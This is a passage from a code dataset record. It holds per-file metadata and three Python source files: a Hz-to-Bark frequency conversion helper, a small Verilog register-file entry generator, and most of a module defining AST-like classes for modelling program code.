0
0.027439
0
0
0
0
0
0
0
null
null
0
0.153846
null
null
0.076923
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
fc403c27d1d4da0e66a446351a2e2650278bc62d
1,527
py
Python
pyACA/ToolFreq2Bark.py
ruohoruotsi/pyACA
339e9395b65a217aa5965638af941b32d5c95454
[ "MIT" ]
81
2019-07-08T15:48:03.000Z
2022-03-21T22:52:25.000Z
pyACA/ToolFreq2Bark.py
ruohoruotsi/pyACA
339e9395b65a217aa5965638af941b32d5c95454
[ "MIT" ]
24
2019-10-03T19:20:18.000Z
2022-02-28T17:20:40.000Z
pyACA/ToolFreq2Bark.py
ruohoruotsi/pyACA
339e9395b65a217aa5965638af941b32d5c95454
[ "MIT" ]
26
2019-07-18T23:50:52.000Z
2022-03-10T14:59:35.000Z
# -*- coding: utf-8 -*- """ helper function: convert Hz to Bark scale Args: fInHz: The frequency to be converted, can be scalar or vector cModel: The name of the model ('Schroeder' [default], 'Terhardt', 'Zwicker', 'Traunmuller') Returns: Bark values of the input dimension """ import numpy as np import math def ToolFreq2Bark(fInHz, cModel = 'Schroeder'): def acaSchroeder_scalar(f): return 7 * math.asinh(f/650) def acaTerhardt_scalar(f): return 13.3 * math.atan(0.75 * f/1000) def acaZwicker_scalar(f): return 13 * math.atan(0.76 * f/1000) + 3.5 * math.atan(f/7500) def acaTraunmuller_scalar(f): return 26.81/(1+1960./f) - 0.53 f = np.asarray(fInHz) if f.ndim == 0: if cModel == 'Terhardt': return acaTerhardt_scalar(f) elif cModel == 'Zwicker': return acaZwicker_scalar(f) elif cModel == 'Traunmuller': return acaTraunmuller_scalar(f) else: return acaSchroeder_scalar(f) fBark = np.zeros(f.shape) if cModel == 'Terhardt': for k,fi in enumerate(f): fBark[k] = acaTerhardt_scalar(fi) elif cModel == 'Zwicker': for k,fi in enumerate(f): fBark[k] = acaZwicker_scalar(fi) elif cModel == 'Traunmuller': for k,fi in enumerate(f): fBark[k] = acaTraunmuller_scalar(fi) else: for k,fi in enumerate(f): fBark[k] = acaSchroeder_scalar(fi) return (fBark)
28.811321
95
0.591356
199
1,527
4.477387
0.38191
0.062851
0.058361
0.035915
0.107744
0.107744
0.107744
0.107744
0
0
0
0.040553
0.289456
1,527
52
96
29.365385
0.780645
0.18795
0
0.342857
0
0
0.049513
0
0
0
0
0
0
1
0.142857
false
0
0.057143
0.114286
0.457143
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
0
0
1
fc416ffd2f7c1bbdb707cd0d27fb98dd3ff367ba
881
py
Python
src/python/make_store_entry.py
kf7lsu/RegfileCompiler-public
0845f1458137cef06d584047bb4287a72c6afbab
[ "Apache-2.0" ]
null
null
null
src/python/make_store_entry.py
kf7lsu/RegfileCompiler-public
0845f1458137cef06d584047bb4287a72c6afbab
[ "Apache-2.0" ]
null
null
null
src/python/make_store_entry.py
kf7lsu/RegfileCompiler-public
0845f1458137cef06d584047bb4287a72c6afbab
[ "Apache-2.0" ]
null
null
null
#this code will generate the structural verilog for a single entry in the register file #takes in the output file manager, the entry number, the number of bits, the number of reads, and the width of the #tristate buffers on the read outputs #expects the same things as make_store_cell, ensure code is valid there #Matthew Trahms #EE 526 #4/20/21 from make_store_cell import make_store_cell def make_store_entry(out_file, entry_number, bits, reads, buff_width, regfile_num): #just need to create the correct number of bits #this and the make_store_array are going to be pretty simple for bit in range(bits): make_store_cell(out_file, entry_number, bit, reads, buff_width, regfile_num) return if __name__ == '__main__': f = open('store_entry_test.txt', 'w') rows = 4 cols = 2 reads = 2 for row in range(rows): make_store_entry(f, row, cols, reads, 1, 0) f.close()
31.464286
114
0.760499
157
881
4.063694
0.522293
0.098746
0.081505
0.056426
0.075235
0
0
0
0
0
0
0.017711
0.166856
881
27
115
32.62963
0.851499
0.496027
0
0
1
0
0.066667
0
0
0
0
0
0
1
0.076923
false
0
0.076923
0
0.230769
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc43b75bb4a6cda564bcd320da8b77c8174105e4
58,644
py
Python
bonsai/model.py
ipa-mirb/bonsai
cb73317cdf779566f7c496fc39546c9c689aa09c
[ "MIT" ]
null
null
null
bonsai/model.py
ipa-mirb/bonsai
cb73317cdf779566f7c496fc39546c9c689aa09c
[ "MIT" ]
null
null
null
bonsai/model.py
ipa-mirb/bonsai
cb73317cdf779566f7c496fc39546c9c689aa09c
[ "MIT" ]
null
null
null
#Copyright (c) 2017 Andre Santos # #Permission is hereby granted, free of charge, to any person obtaining a copy #of this software and associated documentation files (the "Software"), to deal #in the Software without restriction, including without limitation the rights #to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the Software is #furnished to do so, subject to the following conditions: #The above copyright notice and this permission notice shall be included in #all copies or substantial portions of the Software. #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN #THE SOFTWARE. ############################################################################### # Language Model ############################################################################### class CodeEntity(object): """Base class for all programming entities. All code objects have a file name, a line number, a column number, a programming scope (e.g. the function or code block they belong to) and a parent object that should have some variable or collection holding this object. """ def __init__(self, scope, parent): """Base constructor for code objects. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. 
""" self.scope = scope self.parent = parent self.file = None self.line = None self.column = None def walk_preorder(self): """Iterates the program tree starting from this object, going down.""" yield self for child in self._children(): for descendant in child.walk_preorder(): yield descendant def filter(self, cls, recursive=False): """Retrieves all descendants (including self) that are instances of a given class. Args: cls (class): The class to use as a filter. Kwargs: recursive (bool): Whether to descend recursively down the tree. """ source = self.walk_preorder if recursive else self._children return [ codeobj for codeobj in source() if isinstance(codeobj, cls) ] def _afterpass(self): """Finalizes the construction of a code entity.""" pass def _validity_check(self): """Check whether this object is a valid construct.""" return True def _children(self): """Yield all direct children of this object.""" # The default implementation has no children, and thus should return # an empty iterator. return iter(()) def _lookup_parent(self, cls): """Lookup a transitive parent object that is an instance of a given class.""" codeobj = self.parent while codeobj is not None and not isinstance(codeobj, cls): codeobj = codeobj.parent return codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return (' ' * indent) + self.__str__() def ast_str(self, indent=0): """Return a minimal string to print a tree-like structure. Kwargs: indent (int): The number of indentation levels. 
""" line = self.line or 0 col = self.column or 0 name = type(self).__name__ spell = getattr(self, 'name', '[no spelling]') result = ' ({})'.format(self.result) if hasattr(self, 'result') else '' prefix = indent * '| ' return '{}[{}:{}] {}{}: {}'.format(prefix, line, col, name, result, spell) def __str__(self): """Return a string representation of this object.""" return self.__repr__() def __repr__(self): """Return a string representation of this object.""" return '[unknown]' class CodeStatementGroup(object): """This class is meant to provide common utility methods for objects that group multiple program statements together (e.g. functions, code blocks). It is not meant to be instantiated directly, only used for inheritance purposes. It defines the length of a statement group, and provides methods for integer-based indexing of program statements (as if using a list). """ def statement(self, i): """Return the *i*-th statement from the object's `body`.""" return self.body.statement(i) def statement_after(self, i): """Return the statement after the *i*-th one, or `None`.""" try: return self.statement(i + 1) except IndexError as e: return None def __getitem__(self, i): """Return the *i*-th statement from the object's `body`.""" return self.statement(i) def __len__(self): """Return the length of the statement group.""" return len(self.body) # ----- Common Entities ------------------------------------------------------- class CodeVariable(CodeEntity): """This class represents a program variable. A variable typically has a name, a type (`result`) and a value (or `None` for variables without a value or when the value is unknown). Additionally, a variable has an `id` which uniquely identifies it in the program (useful to resolve references), a list of references to it and a list of statements that write new values to the variable. If the variable is a *member*/*field*/*attribute* of an object, `member_of` should contain a reference to such object, instead of `None`. 
""" def __init__(self, scope, parent, id, name, result): """Constructor for variables. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. id: An unique identifier for this variable. name (str): The name of the variable in the program. result (str): The type of the variable in the program. """ CodeEntity.__init__(self, scope, parent) self.id = id self.name = name self.result = result self.value = None self.member_of = None self.references = [] self.writes = [] @property def is_definition(self): return True @property def is_local(self): """Whether this is a local variable. In general, a variable is *local* if its containing scope is a statement (e.g. a block), or a function, given that the variable is not one of the function's parameters. """ return (isinstance(self.scope, CodeStatement) or (isinstance(self.scope, CodeFunction) and self not in self.scope.parameters)) @property def is_global(self): """Whether this is a global variable. In general, a variable is *global* if it is declared directly under the program's global scope or a namespace. """ return isinstance(self.scope, (CodeGlobalScope, CodeNamespace)) @property def is_parameter(self): """Whether this is a function parameter.""" return (isinstance(self.scope, CodeFunction) and self in self.scope.parameters) @property def is_member(self): """Whether this is a member/attribute of a class or object.""" return isinstance(self.scope, CodeClass) def _add(self, codeobj): """Add a child (value) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.value = codeobj def _children(self): """Yield all direct children of this object.""" if isinstance(self.value, CodeEntity): yield self.value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. 
""" return '{}{} {} = {}'.format(' ' * indent, self.result, self.name, pretty_str(self.value)) def __repr__(self): """Return a string representation of this object.""" return '[{}] {} = ({})'.format(self.result, self.name, self.value) class CodeFunction(CodeEntity, CodeStatementGroup): """This class represents a program function. A function typically has a name, a return type (`result`), a list of parameters and a body (a code block). It also has an unique `id` that identifies it in the program and a list of references to it. If a function is a method of some class, its `member_of` should be set to the corresponding class. """ def __init__(self, scope, parent, id, name, result, definition=True): """Constructor for functions. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. id: An unique identifier for this function. name (str): The name of the function in the program. result (str): The return type of the function in the program. """ CodeEntity.__init__(self, scope, parent) self.id = id self.name = name self.result = result self.parameters = [] self.body = CodeBlock(self, self, explicit=True) self.member_of = None self.references = [] self._definition = self if definition else None @property def is_definition(self): """Whether this is a function definition or just a declaration.""" return self._definition is self @property def is_constructor(self): """Whether this function is a class constructor.""" return self.member_of is not None def _add(self, codeobj): """Add a child (statement) to this object.""" assert isinstance(codeobj, (CodeStatement, CodeExpression)) self.body._add(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.parameters: yield codeobj for codeobj in self.body._children(): yield codeobj def _afterpass(self): """Assign a function-local index to each child object and register write operations to variables. 
This should only be called after the object is fully built. """ if hasattr(self, '_fi'): return fi = 0 for codeobj in self.walk_preorder(): codeobj._fi = fi fi += 1 if isinstance(codeobj, CodeOperator) and codeobj.is_assignment: if codeobj.arguments and isinstance(codeobj.arguments[0], CodeReference): var = codeobj.arguments[0].reference if isinstance(var, CodeVariable): var.writes.append(codeobj) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent params = ', '.join(map(lambda p: p.result + ' ' + p.name, self.parameters)) if self.is_constructor: pretty = '{}{}({}):\n'.format(spaces, self.name, params) else: pretty = '{}{} {}({}):\n'.format(spaces, self.result, self.name, params) if self._definition is not self: pretty += spaces + ' [declaration]' else: pretty += self.body.pretty_str(indent + 2) return pretty def __repr__(self): """Return a string representation of this object.""" params = ', '.join(map(str, self.parameters)) return '[{}] {}({})'.format(self.result, self.name, params) class CodeClass(CodeEntity): """This class represents a program class for object-oriented languages. A class typically has a name, an unique `id`, a list of members (variables, functions), a list of superclasses, and a list of references. If a class is defined within another class (inner class), it should have its `member_of` set to the corresponding class. """ def __init__(self, scope, parent, id_, name, definition=True): """Constructor for classes. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. id: An unique identifier for this class. name (str): The name of the class in the program. 
""" CodeEntity.__init__(self, scope, parent) self.id = id_ self.name = name self.members = [] self.superclasses = [] self.member_of = None self.references = [] self._definition = self if definition else None @property def is_definition(self): """Whether this is a definition or a declaration of the class.""" return self._definition is self def _add(self, codeobj): """Add a child (function, variable, class) to this object.""" assert isinstance(codeobj, (CodeFunction, CodeVariable, CodeClass)) self.members.append(codeobj) codeobj.member_of = self def _children(self): """Yield all direct children of this object.""" for codeobj in self.members: yield codeobj def _afterpass(self): """Assign the `member_of` of child members and call their `_afterpass()`. This should only be called after the object is fully built. """ for codeobj in self.members: if not codeobj.is_definition: if not codeobj._definition is None: codeobj._definition.member_of = self codeobj._afterpass() def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = spaces + 'class ' + self.name if self.superclasses: superclasses = ', '.join(self.superclasses) pretty += '(' + superclasses + ')' pretty += ':\n' if self.members: pretty += '\n\n'.join( c.pretty_str(indent + 2) for c in self.members ) else: pretty += spaces + ' [declaration]' return pretty def __repr__(self): """Return a string representation of this object.""" return '[class {}]'.format(self.name) class CodeNamespace(CodeEntity): """This class represents a program namespace. A namespace is a concept that is explicit in languages such as C++, but less explicit in many others. In Python, the closest thing should be a module. In Java, it may be the same as a class, or non-existent. A namespace typically has a name and a list of children objects (variables, functions or classes). 
""" def __init__(self, scope, parent, name): """Constructor for namespaces. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the namespace in the program. """ CodeEntity.__init__(self, scope, parent) self.name = name self.children = [] def _add(self, codeobj): """Add a child (namespace, function, variable, class) to this object.""" assert isinstance(codeobj, (CodeNamespace, CodeClass, CodeFunction, CodeVariable)) self.children.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.children: yield codeobj def _afterpass(self): """Call the `_afterpass()` of child objects. This should only be called after the object is fully built. """ for codeobj in self.children: codeobj._afterpass() def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = '{}namespace {}:\n'.format(spaces, self.name) pretty += '\n\n'.join(c.pretty_str(indent + 2) for c in self.children) return pretty def __repr__(self): """Return a string representation of this object.""" return '[namespace {}]'.format(self.name) class CodeGlobalScope(CodeEntity): """This class represents the global scope of a program. The global scope is the root object of a program. If there are no better candidates, it is the `scope` and `parent` of all other objects. It is also the only object that does not have a `scope` or `parent`. 
""" def __init__(self): """Constructor for global scope objects.""" CodeEntity.__init__(self, None, None) self.children = [] def _add(self, codeobj): """Add a child (namespace, function, variable, class) to this object.""" assert isinstance(codeobj, (CodeNamespace, CodeClass, CodeFunction, CodeVariable)) self.children.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.children: yield codeobj def _afterpass(self): """Call the `_afterpass()` of child objects. This should only be called after the object is fully built. """ for codeobj in self.children: codeobj._afterpass() def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return '\n\n'.join( codeobj.pretty_str(indent=indent) for codeobj in self.children ) # ----- Expression Entities --------------------------------------------------- class CodeExpression(CodeEntity): """Base class for expressions within a program. Expressions can be of many types, including literal values, operators, references and function calls. This class is meant to be inherited from, and not instantiated directly. An expression typically has a name (e.g. the name of the function in a function call) and a type (`result`). Also, an expression should indicate whether it is enclosed in parentheses. """ def __init__(self, scope, parent, name, result, paren=False): """Constructor for expressions. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the expression in the program. result (str): The return type of the expression in the program. Kwargs: paren (bool): Whether the expression is enclosed in parentheses. 
""" CodeEntity.__init__(self, scope, parent) self.name = name self.result = result self.parenthesis = paren @property def function(self): """The function where this expression occurs.""" return self._lookup_parent(CodeFunction) @property def statement(self): """The statement where this expression occurs.""" return self._lookup_parent(CodeStatement) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ if self.parenthesis: return (' ' * indent) + '(' + self.name + ')' return (' ' * indent) + self.name def __repr__(self): """Return a string representation of this object.""" return '[{}] {}'.format(self.result, self.name) class SomeValue(CodeExpression): """This class represents an unknown value for diverse primitive types.""" def __init__(self, result): """Constructor for unknown values.""" CodeExpression.__init__(self, None, None, result, result) def _children(self): """Yield all the children of this object, that is no children.""" return iter(()) SomeValue.INTEGER = SomeValue("int") SomeValue.FLOATING = SomeValue("float") SomeValue.CHARACTER = SomeValue("char") SomeValue.STRING = SomeValue("string") SomeValue.BOOL = SomeValue("bool") class CodeLiteral(CodeExpression): """Base class for literal types not present in Python. This class is meant to represent a literal whose type is not numeric, string or boolean, as bare Python literals are used for those. A literal has a value (e.g. a list `[1, 2, 3]`) and a type (`result`), and could be enclosed in parentheses. It does not have a name. """ def __init__(self, scope, parent, value, result, paren=False): """Constructor for literals. As literals have no name, a constant string is used instead. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. value (CodeExpression|CodeExpression[]): This literal's value. 
result (str): The return type of the literal in the program. Kwargs: paren (bool): Whether the literal is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, 'literal', result, paren) self.value = value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ if self.parenthesis: return '{}({})'.format(' ' * indent, pretty_str(self.value)) return pretty_str(self.value, indent=indent) def __repr__(self): """Return a string representation of this object.""" return '[{}] {!r}'.format(self.result, self.value) CodeExpression.TYPES = (int, long, float, bool, basestring, SomeValue, CodeLiteral, CodeExpression) CodeExpression.LITERALS = (int, long, float, bool, basestring, CodeLiteral) class CodeNull(CodeLiteral): """This class represents an indefinite value. Many programming languages have their own version of this concept: Java has null references, C/C++ NULL pointers, Python None and so on. """ def __init__(self, scope, parent, paren=False): """Constructor for null literals. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. Kwargs: paren (bool): Whether the null literal is enclosed in parentheses. """ CodeLiteral.__init__(self, scope, parent, None, 'null', paren) def _children(self): """Yield all the children of this object, that is no children. This class inherits from CodeLiteral just for consistency with the class hierarchy. It should have no children, thus an empty iterator is returned. """ return iter(()) class CodeCompositeLiteral(CodeLiteral): """This class represents a composite literal. A composite literal is any type of literal whose value is compound, rather than simple. An example present in many programming languages are list literals, often constructed as `[1, 2, 3]`. 
A composite literal has a sequence of values that compose it (`values`), a type (`result`), and it should indicate whether it is enclosed in parentheses. """ def __init__(self, scope, parent, result, value=(), paren=False): """Constructor for a compound literal. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. value (iterable): The initial value sequence in this composition. result (str): The return type of the literal in the program. Kwargs: paren (bool): Whether the literal is enclosed in parentheses. """ try: value = list(value) except TypeError as te: raise AssertionError(str(te)) CodeLiteral.__init__(self, scope, parent, value, result, paren) @property def values(self): return tuple(self.value) def _add_value(self, child): """Add a value to the sequence in this composition.""" self.value.append(child) def _children(self): """Yield all direct children of this object.""" for value in self.value: if isinstance(value, CodeEntity): yield value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent values = '{{{}}}'.format(', '.join(map(pretty_str, self.value))) if self.parenthesis: return '{}({})'.format(indent, values) return '{}{}'.format(indent, values) def __repr__(self): """Return a string representation of this object.""" return '[{}] {{{}}}'.format(self.result, ', '.join(map(repr, self.value))) class CodeReference(CodeExpression): """This class represents a reference expression (e.g. to a variable). A reference typically has a name (of what it is referencing), and a return type. If the referenced entity is known, `reference` should be set. If the reference is a field/attribute of an object, `field_of` should be set to that object. """ def __init__(self, scope, parent, name, result, paren=False): """Constructor for references. 
Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the reference in the program. result (str): The return type of the expression in the program. Kwargs: paren (bool): Whether the reference is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, name, result, paren) self.field_of = None self.reference = None def _set_field(self, codeobj): """Set the object that contains the attribute this is a reference of.""" assert isinstance(codeobj, CodeExpression) self.field_of = codeobj def _children(self): """Yield all direct children of this object.""" if self.field_of: yield self.field_of def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = '{}({})' if self.parenthesis else '{}{}' name = ('{}.{}'.format(self.field_of.pretty_str(), self.name) if self.field_of else self.name) return pretty.format(spaces, name) def __str__(self): """Return a string representation of this object.""" return '#' + self.name def __repr__(self): """Return a string representation of this object.""" if self.field_of: return '[{}] ({}).{}'.format(self.result, self.field_of, self.name) return '[{}] #{}'.format(self.result, self.name) class CodeOperator(CodeExpression): """This class represents an operator expression (e.g. `a + b`). Operators can be unary or binary, and often return numbers or booleans. Some languages also support ternary operators. Do note that assignments are often considered expressions, and, as such, assignment operators are included here. An operator typically has a name (its token), a return type, and a tuple of its arguments. 
""" _UNARY_TOKENS = ("+", "-") _BINARY_TOKENS = ("+", "-", "*", "/", "%", "<", ">", "<=", ">=", "==", "!=", "&&", "||", "=") def __init__(self, scope, parent, name, result, args=None, paren=False): """Constructor for operators. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the operator in the program. result (str): The return type of the operator in the program. Kwargs: args (tuple): Initial tuple of arguments. paren (bool): Whether the expression is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, name, result, paren) self.arguments = args or () @property def is_unary(self): """Whether this is a unary operator.""" return len(self.arguments) == 1 @property def is_binary(self): """Whether this is a binary operator.""" return len(self.arguments) == 2 @property def is_ternary(self): """Whether this is a ternary operator.""" return len(self.arguments) == 3 @property def is_assignment(self): """Whether this is an assignment operator.""" return self.name == "=" def _add(self, codeobj): """Add a child (argument) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.arguments = self.arguments + (codeobj,) def _children(self): """Yield all direct children of this object.""" for codeobj in self.arguments: if isinstance(codeobj, CodeExpression): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. 
""" indent = ' ' * indent pretty = '{}({})' if self.parenthesis else '{}{}' if self.is_unary: operator = self.name + pretty_str(self.arguments[0]) else: operator = '{} {} {}'.format(pretty_str(self.arguments[0]), self.name, pretty_str(self.arguments[1])) return pretty.format(indent, operator) def __repr__(self): """Return a string representation of this object.""" if self.is_unary: return '[{}] {}({})'.format(self.result, self.name, self.arguments[0]) if self.is_binary: return '[{}] ({}){}({})'.format(self.result, self.arguments[0], self.name, self.arguments[1]) return '[{}] {}'.format(self.result, self.name) class CodeFunctionCall(CodeExpression): """This class represents a function call. A function call typically has a name (of the called function), a return type, a tuple of its arguments and a reference to the called function. If a call references a class method, its `method_of` should be set to the object on which a method is being called. """ def __init__(self, scope, parent, name, result, paren=False): """Constructor for function calls. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the function in the program. result (str): The return type of the expression in the program. Kwargs: paren (bool): Whether the expression is enclosed in parentheses. 
""" CodeExpression.__init__(self, scope, parent, name, result, paren) self.full_name = name self.arguments = () self.method_of = None self.reference = None @property def is_constructor(self): """Whether the called function is a constructor.""" return self.result == self.name def _add(self, codeobj): """Add a child (argument) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.arguments = self.arguments + (codeobj,) def _set_method(self, codeobj): """Set the object on which a method is called.""" assert isinstance(codeobj, CodeExpression) self.method_of = codeobj def _children(self): """Yield all direct children of this object.""" if self.method_of: yield self.method_of for codeobj in self.arguments: if isinstance(codeobj, CodeExpression): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent pretty = '{}({})' if self.parenthesis else '{}{}' args = ', '.join(map(pretty_str, self.arguments)) if self.method_of: call = '{}.{}({})'.format(self.method_of.pretty_str(), self.name, args) elif self.is_constructor: call = 'new {}({})'.format(self.name, args) else: call = '{}({})'.format(self.name, args) return pretty.format(indent, call) def __repr__(self): """Return a string representation of this object.""" args = ', '.join(map(str, self.arguments)) if self.is_constructor: return '[{}] new {}({})'.format(self.result, self.name, args) if self.method_of: return '[{}] {}.{}({})'.format(self.result, self.method_of.name, self.name, args) return '[{}] {}({})'.format(self.result, self.name, args) class CodeDefaultArgument(CodeExpression): """This class represents a default argument. Some languages, such as C++, allow function parameters to have default values when not explicitly provided by the programmer. This class represents such omitted arguments. A default argument has only a return type. 
""" def __init__(self, scope, parent, result): """Constructor for default arguments. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. result (str): The return type of the argument in the program. """ CodeExpression.__init__(self, scope, parent, '(default)', result) # ----- Statement Entities ---------------------------------------------------- class CodeStatement(CodeEntity): """Base class for program statements. Programming languages often define diverse types of statements (e.g. return statements, control flow, etc.). This class provides common functionality for such statements. In many languages, statements must be contained within a function. An operator typically has a name (its token), a return type, and a tuple of its arguments. """ def __init__(self, scope, parent): """Constructor for statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeEntity.__init__(self, scope, parent) self._si = -1 @property def function(self): """The function where this statement appears in.""" return self._lookup_parent(CodeFunction) class CodeJumpStatement(CodeStatement): """This class represents a jump statement (e.g. `return`, `break`). A jump statement has a name. In some cases, it may also have an associated value (e.g. `return 0`). """ def __init__(self, scope, parent, name): """Constructor for jump statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the statement in the program. 
""" CodeStatement.__init__(self, scope, parent) self.name = name self.value = None def _add(self, codeobj): """Add a child (value) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.value = codeobj def _children(self): """Yield all direct children of this object.""" if isinstance(self.value, CodeExpression): yield self.value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent if self.value is not None: return '{}{} {}'.format(indent, self.name, pretty_str(self.value)) return indent + self.name def __repr__(self): """Return a string representation of this object.""" if self.value is not None: return '{} {}'.format(self.name, str(self.value)) return self.name class CodeExpressionStatement(CodeStatement): """This class represents an expression statement. It is only a wrapper. Many programming languages allow expressions to be statements on their own. A common example is the assignment operator, which can be a statement on its own, but also returns a value when contained within a larger expression. """ def __init__(self, scope, parent, expression=None): """Constructor for expression statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. Kwargs: expression (CodeExpression): The expression of this statement. """ CodeStatement.__init__(self, scope, parent) self.expression = expression def _children(self): """Yield all direct children of this object.""" if isinstance(self.expression, CodeExpression): yield self.expression def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. 
""" return pretty_str(self.expression, indent=indent) def __repr__(self): """Return a string representation of this object.""" return repr(self.expression) class CodeBlock(CodeStatement, CodeStatementGroup): """This class represents a code block (e.g. `{}` in C, C++, Java, etc.). Blocks are little more than collections of statements, while being considered a statement themselves. Some languages allow blocks to be implicit in some contexts, e.g. an `if` statement omitting curly braces in C, C++, Java, etc. This model assumes that control flow branches and functions always have a block as their body. """ def __init__(self, scope, parent, explicit=True): """Constructor for code blocks. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. Kwargs: explicit (bool): Whether the block is explicit in the code. """ CodeStatement.__init__(self, scope, parent) self.body = [] self.explicit = explicit def statement(self, i): """Return the *i*-th statement of this block.""" return self.body[i] def _add(self, codeobj): """Add a child (statement) to this object.""" assert isinstance(codeobj, CodeStatement) codeobj._si = len(self.body) self.body.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.body: yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ if self.body: return '\n'.join(stmt.pretty_str(indent) for stmt in self.body) else: return (' ' * indent) + '[empty]' def __repr__(self): """Return a string representation of this object.""" return str(self.body) class CodeDeclaration(CodeStatement): """This class represents a declaration statement. Some languages, such as C, C++ or Java, consider this special kind of statement for declaring variables within a function, for instance. 
A declaration statement contains a list of all declared variables. """ def __init__(self, scope, parent): """Constructor for declaration statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeStatement.__init__(self, scope, parent) self.variables = [] def _add(self, codeobj): """Add a child (variable) to this object.""" assert isinstance(codeobj, CodeVariable) self.variables.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.variables: yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent return spaces + ', '.join(v.pretty_str() for v in self.variables) def __repr__(self): """Return a string representation of this object.""" return str(self.variables) class CodeControlFlow(CodeStatement, CodeStatementGroup): """Base class for control flow structures (e.g. `for` loops). Control flow statements are assumed to have, at least, one branch (a boolean condition and a `CodeBlock` that is executed when the condition is met). Specific implementations may consider more branches, or default branches (executed when no condition is met). A control flow statement typically has a name. """ def __init__(self, scope, parent, name): """Constructor for control flow structures. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the control flow statement in the program. 
